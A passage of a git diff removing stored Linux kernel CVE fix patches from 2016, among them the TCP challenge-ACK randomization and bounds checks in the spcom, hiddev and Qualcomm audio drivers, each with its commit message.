-+	TZ_SYSCALL_CREATE_SMC_ID(TZ_OWNER_QSEE_OS, TZ_SVC_LISTENER, 0x05)
-+
-+#define TZ_OS_LISTENER_RESPONSE_HANDLER_WITH_WHITELIST_PARAM_ID \
-+	TZ_SYSCALL_CREATE_PARAM_ID_4( \
-+	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_VAL, \
-+	TZ_SYSCALL_PARAM_TYPE_BUF_RW, TZ_SYSCALL_PARAM_TYPE_VAL)
-+
- #endif /* __QSEECOMI_H_ */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5696/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5696/ANY/0001.patch
deleted file mode 100644
index d91940dc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5696/ANY/0001.patch
+++ /dev/null
@@ -1,81 +0,0 @@
-From 75ff39ccc1bd5d3c455b6822ab09e533c551f758 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Sun, 10 Jul 2016 10:04:02 +0200
-Subject: tcp: make challenge acks less predictable
-
-Yue Cao claims that current host rate limiting of challenge ACKS
-(RFC 5961) could leak enough information to allow a patient attacker
-to hijack TCP sessions. He will soon provide details in an academic
-paper.
-
-This patch increases the default limit from 100 to 1000, and adds
-some randomization so that the attacker can no longer hijack
-sessions without spending a considerable amount of probes.
-
-Based on initial analysis and patch from Linus.
-
-Note that we also have per socket rate limiting, so it is tempting
-to remove the host limit in the future.
-
-v2: randomize the count of challenge acks per second, not the period.
-
-Fixes: 282f23c6ee34 ("tcp: implement RFC 5961 3.2")
-Reported-by: Yue Cao <ycao009@ucr.edu>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Yuchung Cheng <ycheng@google.com>
-Cc: Neal Cardwell <ncardwell@google.com>
-Acked-by: Neal Cardwell <ncardwell@google.com>
-Acked-by: Yuchung Cheng <ycheng@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/tcp_input.c | 15 ++++++++++-----
- 1 file changed, 10 insertions(+), 5 deletions(-)
-
-diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
-index d6c8f4cd0..91868bb 100644
---- a/net/ipv4/tcp_input.c
-+++ b/net/ipv4/tcp_input.c
-@@ -87,7 +87,7 @@ int sysctl_tcp_adv_win_scale __read_mostly = 1;
- EXPORT_SYMBOL(sysctl_tcp_adv_win_scale);
- 
- /* rfc5961 challenge ack rate limiting */
--int sysctl_tcp_challenge_ack_limit = 100;
-+int sysctl_tcp_challenge_ack_limit = 1000;
- 
- int sysctl_tcp_stdurg __read_mostly;
- int sysctl_tcp_rfc1337 __read_mostly;
-@@ -3458,7 +3458,7 @@ static void tcp_send_challenge_ack(struct sock *sk, const struct sk_buff *skb)
- 	static u32 challenge_timestamp;
- 	static unsigned int challenge_count;
- 	struct tcp_sock *tp = tcp_sk(sk);
--	u32 now;
-+	u32 count, now;
- 
- 	/* First check our per-socket dupack rate limit. */
- 	if (tcp_oow_rate_limited(sock_net(sk), skb,
-@@ -3466,13 +3466,18 @@ static void tcp_send_challenge_ack(struct sock *sk, const struct sk_buff *skb)
- 				 &tp->last_oow_ack_time))
- 		return;
- 
--	/* Then check the check host-wide RFC 5961 rate limit. */
-+	/* Then check host-wide RFC 5961 rate limit. */
- 	now = jiffies / HZ;
- 	if (now != challenge_timestamp) {
-+		u32 half = (sysctl_tcp_challenge_ack_limit + 1) >> 1;
-+
- 		challenge_timestamp = now;
--		challenge_count = 0;
-+		WRITE_ONCE(challenge_count, half +
-+			   prandom_u32_max(sysctl_tcp_challenge_ack_limit));
- 	}
--	if (++challenge_count <= sysctl_tcp_challenge_ack_limit) {
-+	count = READ_ONCE(challenge_count);
-+	if (count > 0) {
-+		WRITE_ONCE(challenge_count, count - 1);
- 		NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPCHALLENGEACK);
- 		tcp_send_ack(sk);
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5829/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5829/ANY/0001.patch
deleted file mode 100644
index 27ecb6a7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5829/ANY/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From af37375834fe1dd7a7a08c6042664ffc2a1a3beb Mon Sep 17 00:00:00 2001
-From: Sriharsha Allenki <sallenki@codeaurora.org>
-Date: Thu, 22 Dec 2016 14:57:44 +0530
-Subject: hid: usbhid: Changes to prevent buffer overflow
-
-Moved some value checks to right positions to prevent
-buffer flow, which may be possible before. Previously
-these value checks are in an else statement which may
-not be executed.
-
-Change-Id: I02dbecd074183581a6bdae6377097bc004bd3d3c
-CRs-fixed: 1102936
-Signed-off-by: Sriharsha Allenki <sallenki@codeaurora.org>
----
- drivers/hid/usbhid/hiddev.c | 19 ++++++++++---------
- 1 file changed, 10 insertions(+), 9 deletions(-)
-
-(limited to 'drivers/hid/usbhid/hiddev.c')
-
-diff --git a/drivers/hid/usbhid/hiddev.c b/drivers/hid/usbhid/hiddev.c
-index 2f1ddca..602f163 100644
---- a/drivers/hid/usbhid/hiddev.c
-+++ b/drivers/hid/usbhid/hiddev.c
-@@ -510,18 +510,19 @@ static noinline int hiddev_ioctl_usage(struct hiddev *hiddev, unsigned int cmd,
- 				goto inval;
- 
- 			field = report->field[uref->field_index];
-+		}
- 
--			if (cmd == HIDIOCGCOLLECTIONINDEX) {
--				if (uref->usage_index >= field->maxusage)
--					goto inval;
--			} else if (uref->usage_index >= field->report_count)
-+		if (cmd == HIDIOCGCOLLECTIONINDEX) {
-+			if (uref->usage_index >= field->maxusage)
- 				goto inval;
-+		} else if (uref->usage_index >= field->report_count)
-+			goto inval;
- 
--			else if ((cmd == HIDIOCGUSAGES || cmd == HIDIOCSUSAGES) &&
--				 (uref_multi->num_values > HID_MAX_MULTI_USAGES ||
--				  uref->usage_index + uref_multi->num_values > field->report_count))
--				goto inval;
--		}
-+		else if ((cmd == HIDIOCGUSAGES || cmd == HIDIOCSUSAGES) &&
-+			 (uref_multi->num_values > HID_MAX_MULTI_USAGES ||
-+			uref->usage_index + uref_multi->num_values >
-+			field->report_count))
-+			goto inval;
- 
- 		switch (cmd) {
- 		case HIDIOCGUSAGE:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5853/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5853/3.10/0001.patch
deleted file mode 100644
index 5a346499..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5853/3.10/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From e879fc7eca7e3ba0ab9dcf24d2f717e49718a01e Mon Sep 17 00:00:00 2001
-From: kunleiz <kunleiz@codeaurora.org>
-Date: Tue, 27 Dec 2016 16:15:51 +0800
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-Return an error code to ensure valid length value is valid.
-
-CRs-fixed: 1102987
-Change-Id: I6a679d08342d1da58c20b5c3d4e436dd335764ae
-Signed-off-by: kunleiz <kunleiz@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 59835e6..d654b30 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -1656,6 +1656,7 @@ static int msm_ds2_dap_param_visualizer_control_get(u32 cmd, void *arg)
- 		ret = 0;
- 		dolby_data->length = 0;
- 		pr_err("%s Incorrect VCNB length", __func__);
-+		return -EINVAL;
- 	}
- 
- 	params_length = (2*length + DOLBY_VIS_PARAM_HEADER_SIZE) *
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5853/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5853/3.18/0002.patch
deleted file mode 100644
index aa063c79..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5853/3.18/0002.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 49d27afe9a76273e0d5314cf9241d1d1c3561d13 Mon Sep 17 00:00:00 2001
-From: kunleiz <kunleiz@codeaurora.org>
-Date: Tue, 27 Dec 2016 16:15:51 +0800
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-Return an error code to ensure valid length value is valid.
-
-CRs-fixed: 1102987
-Change-Id: I6a679d08342d1da58c20b5c3d4e436dd335764ae
-Signed-off-by: kunleiz <kunleiz@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 59835e6..d654b30 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -1656,6 +1656,7 @@ static int msm_ds2_dap_param_visualizer_control_get(u32 cmd, void *arg)
- 		ret = 0;
- 		dolby_data->length = 0;
- 		pr_err("%s Incorrect VCNB length", __func__);
-+		return -EINVAL;
- 	}
- 
- 	params_length = (2*length + DOLBY_VIS_PARAM_HEADER_SIZE) *
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5853/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-5853/4.4/0003.patch
deleted file mode 100644
index 633b04f9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5853/4.4/0003.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From a8f3b894de319718aecfc2ce9c691514696805be Mon Sep 17 00:00:00 2001
-From: kunleiz <kunleiz@codeaurora.org>
-Date: Tue, 27 Dec 2016 16:15:51 +0800
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-Return an error code to ensure length value is valid.
-
-CRs-fixed: 1102987
-Change-Id: I6a679d08342d1da58c20b5c3d4e436dd335764ae
-Signed-off-by: kunleiz <kunleiz@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 2441cab..ca6f70f 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -1642,6 +1642,7 @@ static int msm_ds2_dap_param_visualizer_control_get(u32 cmd, void *arg)
- 		ret = 0;
- 		dolby_data->length = 0;
- 		pr_err("%s Incorrect VCNB length", __func__);
-+		return -EINVAL;
- 	}
- 
- 	params_length = (2*length + DOLBY_VIS_PARAM_HEADER_SIZE) *
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5854/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5854/ANY/0001.patch
deleted file mode 100644
index 959b62e3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5854/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 28d23d4d7999f683b27b6e0c489635265b67a4c9 Mon Sep 17 00:00:00 2001
-From: Amir Samuelov <amirs@codeaurora.org>
-Date: Sat, 26 Nov 2016 18:44:06 +0200
-Subject: spcom: check size before calling copy_to_user()
-
-Calling copy_to_user(to, from, size) with negative value
-might cause heap overflow since size is unsigned parameter
-and negative value is cast to big unsigned value.
-
-CRs-Fixed: 1092683
-Change-Id: I9b4a0710aa33942de2976f7ee158a8025dd6a20e
-Signed-off-by: Amir Samuelov <amirs@codeaurora.org>
----
- drivers/soc/qcom/spcom.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/soc/qcom/spcom.c b/drivers/soc/qcom/spcom.c
-index fcdcf0b..7cb538b 100644
---- a/drivers/soc/qcom/spcom.c
-+++ b/drivers/soc/qcom/spcom.c
-@@ -2125,6 +2125,11 @@ static ssize_t spcom_device_read(struct file *filp, char __user *user_buff,
- 		return -ENOMEM;
- 
- 	actual_size = spcom_handle_read(ch, buf, size);
-+	if ((actual_size <= 0) || (actual_size > size)) {
-+		pr_err("invalid actual_size [%d].\n", actual_size);
-+		kfree(buf);
-+		return -EFAULT;
-+	}
- 
- 	ret = copy_to_user(user_buff, buf, actual_size);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5855/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5855/ANY/0001.patch
deleted file mode 100644
index 5f744ed8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5855/ANY/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From a5edb54e93ba85719091fe2bc426d75fa7059834 Mon Sep 17 00:00:00 2001
-From: Amir Samuelov <amirs@codeaurora.org>
-Date: Tue, 29 Nov 2016 10:58:54 +0200
-Subject: spcom: check user space command size
-
-The user space spcomlib provides command buffer
-for various commands.
-Verify that the command buffer size matches the expected
-command struct size.
-
-CRs-Fixed: 1094143
-Change-Id: If3ead54bd03368fa9338921e299b2ad8fb078297
-Signed-off-by: Amir Samuelov <amirs@codeaurora.org>
----
- drivers/soc/qcom/spcom.c | 13 ++++++++++++-
- 1 file changed, 12 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/soc/qcom/spcom.c b/drivers/soc/qcom/spcom.c
-index 0c5f3b8..ebb6b13 100644
---- a/drivers/soc/qcom/spcom.c
-+++ b/drivers/soc/qcom/spcom.c
-@@ -1539,13 +1539,18 @@ static int spcom_handle_lock_ion_buf_command(struct spcom_channel *ch,
- 	struct ion_handle *ion_handle;
- 	int i;
- 
-+	if (size != sizeof(*cmd)) {
-+		pr_err("cmd size [%d] , expected [%d].\n",
-+		       (int) size,  (int) sizeof(*cmd));
-+		return -EINVAL;
-+	}
-+
- 	/* Check ION client */
- 	if (spcom_dev->ion_client == NULL) {
- 		pr_err("invalid ion client.\n");
- 		return -ENODEV;
- 	}
- 
--
- 	/* Get ION handle from fd - this increments the ref count */
- 	ion_handle = ion_import_dma_buf(spcom_dev->ion_client, fd);
- 	if (ion_handle == NULL) {
-@@ -1591,6 +1596,12 @@ static int spcom_handle_unlock_ion_buf_command(struct spcom_channel *ch,
- 	struct ion_client *ion_client = spcom_dev->ion_client;
- 	int i;
- 
-+	if (size != sizeof(*cmd)) {
-+		pr_err("cmd size [%d] , expected [%d].\n",
-+		       (int) size,  (int) sizeof(*cmd));
-+		return -EINVAL;
-+	}
-+
- 	/* Check ION client */
- 	if (ion_client == NULL) {
- 		pr_err("fail to create ion client.\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5856/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5856/ANY/0001.patch
deleted file mode 100644
index 0a7dd488..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5856/ANY/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 0c0622914ba53cdcb6e79e85f64bfdf7762c0368 Mon Sep 17 00:00:00 2001
-From: Amir Samuelov <amirs@codeaurora.org>
-Date: Tue, 6 Dec 2016 16:42:14 +0200
-Subject: spcom: check buf_size validity for user send command
-
-Check command buf size before allocating kernel buffer.
-
-CRs-Fixed: 1094078
-Change-Id: Ib03cd8c79966ff35863c1bde99089cac018ab45c
-Signed-off-by: Amir Samuelov <amirs@codeaurora.org>
----
- drivers/soc/qcom/spcom.c | 22 ++++++++++++++++++++++
- 1 file changed, 22 insertions(+)
-
-diff --git a/drivers/soc/qcom/spcom.c b/drivers/soc/qcom/spcom.c
-index 0c5f3b8..19388f1 100644
---- a/drivers/soc/qcom/spcom.c
-+++ b/drivers/soc/qcom/spcom.c
-@@ -1333,6 +1333,16 @@ static int spcom_handle_send_command(struct spcom_channel *ch,
- 
- 	pr_debug("send req/resp ch [%s] size [%d] .\n", ch->name, size);
- 
-+	/*
-+	 * check that cmd buf size is at least struct size,
-+	 * to allow access to struct fields.
-+	 */
-+	if (size < sizeof(*cmd)) {
-+		pr_err("ch [%s] invalid cmd buf.\n",
-+			ch->name);
-+		return -EINVAL;
-+	}
-+
- 	/* Check if remote side connect */
- 	if (!spcom_is_channel_connected(ch)) {
- 		pr_err("ch [%s] remote side not connect.\n", ch->name);
-@@ -1344,6 +1354,18 @@ static int spcom_handle_send_command(struct spcom_channel *ch,
- 	buf_size = cmd->buf_size;
- 	timeout_msec = cmd->timeout_msec;
- 
-+	/* Check param validity */
-+	if (buf_size > SPCOM_MAX_RESPONSE_SIZE) {
-+		pr_err("ch [%s] invalid buf size [%d].\n",
-+			ch->name, buf_size);
-+		return -EINVAL;
-+	}
-+	if (size != sizeof(*cmd) + buf_size) {
-+		pr_err("ch [%s] invalid cmd size [%d].\n",
-+			ch->name, size);
-+		return -EINVAL;
-+	}
-+
- 	/* Allocate Buffers*/
- 	tx_buf_size = sizeof(*hdr) + buf_size;
- 	tx_buf = kzalloc(tx_buf_size, GFP_KERNEL);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5857/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5857/ANY/0001.patch
deleted file mode 100644
index 1022f527..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5857/ANY/0001.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From d9d2c405d46ca27b25ed55a8dbd02bd1e633e2d5 Mon Sep 17 00:00:00 2001
-From: Amir Samuelov <amirs@codeaurora.org>
-Date: Tue, 6 Dec 2016 18:18:16 +0200
-Subject: spcom: check buf size for send modified command
-
-Check buffer size validity before allocating kernel buffer.
-
-CRs-Fixed: 1094140
-Change-Id: I8c280b60f316d7bae87644104d18aa7df4af9efe
-Signed-off-by: Amir Samuelov <amirs@codeaurora.org>
----
- drivers/soc/qcom/spcom.c | 34 ++++++++++++++++++++++++++++++++++
- 1 file changed, 34 insertions(+)
-
-diff --git a/drivers/soc/qcom/spcom.c b/drivers/soc/qcom/spcom.c
-index 0c5f3b8..48f1157 100644
---- a/drivers/soc/qcom/spcom.c
-+++ b/drivers/soc/qcom/spcom.c
-@@ -1407,6 +1407,11 @@ static int modify_ion_addr(void *buf,
- 		return -ENODEV;
- 	}
- 
-+	if (buf_size < sizeof(uint64_t)) {
-+		pr_err("buf size too small [%d].\n", buf_size);
-+		return -ENODEV;
-+	}
-+
- 	if (buf_offset > buf_size - sizeof(uint64_t)) {
- 		pr_err("invalid buf_offset [%d].\n", buf_offset);
- 		return -ENODEV;
-@@ -1469,6 +1474,16 @@ static int spcom_handle_send_modified_command(struct spcom_channel *ch,
- 
- 	pr_debug("send req/resp ch [%s] size [%d] .\n", ch->name, size);
- 
-+	/*
-+	 * check that cmd buf size is at least struct size,
-+	 * to allow access to struct fields.
-+	 */
-+	if (size < sizeof(*cmd)) {
-+		pr_err("ch [%s] invalid cmd buf.\n",
-+			ch->name);
-+		return -EINVAL;
-+	}
-+
- 	/* Check if remote side connect */
- 	if (!spcom_is_channel_connected(ch)) {
- 		pr_err("ch [%s] remote side not connect.\n", ch->name);
-@@ -1481,6 +1496,18 @@ static int spcom_handle_send_modified_command(struct spcom_channel *ch,
- 	timeout_msec = cmd->timeout_msec;
- 	memcpy(ion_info, cmd->ion_info, sizeof(ion_info));
- 
-+	/* Check param validity */
-+	if (buf_size > SPCOM_MAX_RESPONSE_SIZE) {
-+		pr_err("ch [%s] invalid buf size [%d].\n",
-+			ch->name, buf_size);
-+		return -EINVAL;
-+	}
-+	if (size != sizeof(*cmd) + buf_size) {
-+		pr_err("ch [%s] invalid cmd size [%d].\n",
-+			ch->name, size);
-+		return -EINVAL;
-+	}
-+
- 	/* Allocate Buffers*/
- 	tx_buf_size = sizeof(*hdr) + buf_size;
- 	tx_buf = kzalloc(tx_buf_size, GFP_KERNEL);
-@@ -1746,6 +1773,13 @@ static int spcom_handle_read_req_resp(struct spcom_channel *ch,
- 		return -ENOTCONN;
- 	}
- 
-+	/* Check param validity */
-+	if (size > SPCOM_MAX_RESPONSE_SIZE) {
-+		pr_err("ch [%s] inavlid size [%d].\n",
-+			ch->name, size);
-+		return -EINVAL;
-+	}
-+
- 	/* Allocate Buffers*/
- 	rx_buf_size = sizeof(*hdr) + size;
- 	rx_buf = kzalloc(rx_buf_size, GFP_KERNEL);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5858/ANY/0001.patch
deleted file mode 100644
index d2eacb6f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 3154eb1d263b9c3eab2c9fa8ebe498390bf5d711 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Mani <kmani@codeaurora.org>
-Date: Wed, 7 Dec 2016 18:19:31 -0800
-Subject: ASoC: wcd9320: Fix out of bounds for mad input value
-
-Add check in taiko_mad_input_put function to
-return error on out of bounds access using
-mad input value
-
-CRs-fixed: 1096799
-Change-Id: I75ce9e881cf05a50e874a555b2f8bd3286cdaed4
-Signed-off-by: Karthikeyan Mani <kmani@codeaurora.org>
----
- sound/soc/codecs/wcd9320.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/sound/soc/codecs/wcd9320.c b/sound/soc/codecs/wcd9320.c
-index cb91030..ff199c14e 100644
---- a/sound/soc/codecs/wcd9320.c
-+++ b/sound/soc/codecs/wcd9320.c
-@@ -1208,6 +1208,14 @@ static int taiko_mad_input_put(struct snd_kcontrol *kcontrol,
- 
- 	taiko_mad_input = ucontrol->value.integer.value[0];
- 
-+	if (taiko_mad_input >= ARRAY_SIZE(taiko_conn_mad_text)) {
-+		dev_err(codec->dev,
-+			"%s: taiko_mad_input = %d out of bounds\n",
-+			__func__, taiko_mad_input);
-+		return -EINVAL;
-+	}
-+
-+
- 	micb_4_int_reg = taiko->resmgr.reg_addr->micb_4_int_rbias;
- 	pr_debug("%s: taiko_mad_input = %s\n", __func__,
- 			taiko_conn_mad_text[taiko_mad_input]);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-5858/ANY/0002.patch
deleted file mode 100644
index c7cbeb9e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0002.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From afc5bea71bc8f251dad1104568383019f4923af6 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Mani <kmani@codeaurora.org>
-Date: Wed, 14 Dec 2016 11:33:18 -0800
-Subject: ASoC: wcd9330: Fix out of bounds for mad input value
-
-Add check in tomtom_mad_input_put function to
-return error on out of bounds access using
-mad input value
-
-CRs-fixed: 1096799
-Change-Id: I16f8627b29c7b14a8dc0433b21aa21bf96e98905
-Signed-off-by: Karthikeyan Mani <kmani@codeaurora.org>
----
- sound/soc/codecs/wcd9330.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/codecs/wcd9330.c b/sound/soc/codecs/wcd9330.c
-index 22f3f85..7fb1096 100644
---- a/sound/soc/codecs/wcd9330.c
-+++ b/sound/soc/codecs/wcd9330.c
-@@ -1377,6 +1377,13 @@ static int tomtom_mad_input_put(struct snd_kcontrol *kcontrol,
- 	tomtom_mad_input = ucontrol->value.integer.value[0];
- 	micb_4_int_reg = tomtom->resmgr.reg_addr->micb_4_int_rbias;
- 
-+	if (tomtom_mad_input >= ARRAY_SIZE(tomtom_conn_mad_text)) {
-+		dev_err(codec->dev,
-+			"%s: tomtom_mad_input = %d out of bounds\n",
-+			__func__, tomtom_mad_input);
-+		return -EINVAL;
-+	}
-+
- 	pr_debug("%s: tomtom_mad_input = %s\n", __func__,
- 			tomtom_conn_mad_text[tomtom_mad_input]);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-5858/ANY/0003.patch
deleted file mode 100644
index bd6cb256..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0003.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 3bfe5a89916f7d29492e9f6d941d108b688cb804 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Mani <kmani@codeaurora.org>
-Date: Wed, 14 Dec 2016 11:46:35 -0800
-Subject: ASoC: wcd9335: Fix out of bounds for mad input value
-
-Add check in tasha_mad_input_put function to
-return error on out of bounds access using
-mad input value.
-
-CRs-fixed: 1096799
-Change-Id: Iddaa3fef362f7cb1919aa3bd8dd4b83133fe7c97
-Signed-off-by: Karthikeyan Mani <kmani@codeaurora.org>
----
- sound/soc/codecs/wcd9335.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/codecs/wcd9335.c b/sound/soc/codecs/wcd9335.c
-index c94623c..1f97326 100644
---- a/sound/soc/codecs/wcd9335.c
-+++ b/sound/soc/codecs/wcd9335.c
-@@ -7575,6 +7575,13 @@ static int tasha_mad_input_put(struct snd_kcontrol *kcontrol,
- 
- 	tasha_mad_input = ucontrol->value.integer.value[0];
- 
-+	if (tasha_mad_input >= ARRAY_SIZE(tasha_conn_mad_text)) {
-+		dev_err(codec->dev,
-+			"%s: tasha_mad_input = %d out of bounds\n",
-+			__func__, tasha_mad_input);
-+		return -EINVAL;
-+	}
-+
- 	if (!strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED1") ||
- 	    !strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED2") ||
- 	    !strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED3") ||
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5859/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5859/3.10/0001.patch
deleted file mode 100644
index 81b2bac5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5859/3.10/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 302b5348ecbba8cf032a9ffaaa63222a2b285d89 Mon Sep 17 00:00:00 2001
-From: Sharad Sangle <assangle@codeaurora.org>
-Date: Tue, 13 Dec 2016 14:35:39 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-fetch visualizer data.
-
-CRs-fixed: 1096672
-Change-Id: I224bc2f20d94182713c565972fb0bd52cad6f3fd
-Signed-off-by: Sharad Sangle <assangle@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index bb0f890..5866e46 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014, 2016, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -18,6 +18,10 @@
- 
- #include "msm-dolby-dap-config.h"
- 
-+#ifndef DOLBY_PARAM_VCNB_MAX_LENGTH
-+#define DOLBY_PARAM_VCNB_MAX_LENGTH 40
-+#endif
-+
- /* dolby endp based parameters */
- struct dolby_dap_endp_params_s {
- 	int device;
-@@ -896,6 +900,11 @@ int msm_dolby_dap_param_visualizer_control_get(struct snd_kcontrol *kcontrol,
- 	uint32_t param_payload_len =
- 		DOLBY_PARAM_PAYLOAD_SIZE * sizeof(uint32_t);
- 	int port_id, copp_idx, idx;
-+	if (length > DOLBY_PARAM_VCNB_MAX_LENGTH || length <= 0) {
-+		pr_err("%s Incorrect VCNB length", __func__);
-+		ucontrol->value.integer.value[0] = 0;
-+		return -EINVAL;
-+	}
- 	for (idx = 0; idx < AFE_MAX_PORTS; idx++) {
- 		port_id = dolby_dap_params_states.port_id[idx];
- 		copp_idx = dolby_dap_params_states.copp_idx[idx];
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5859/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5859/3.18/0002.patch
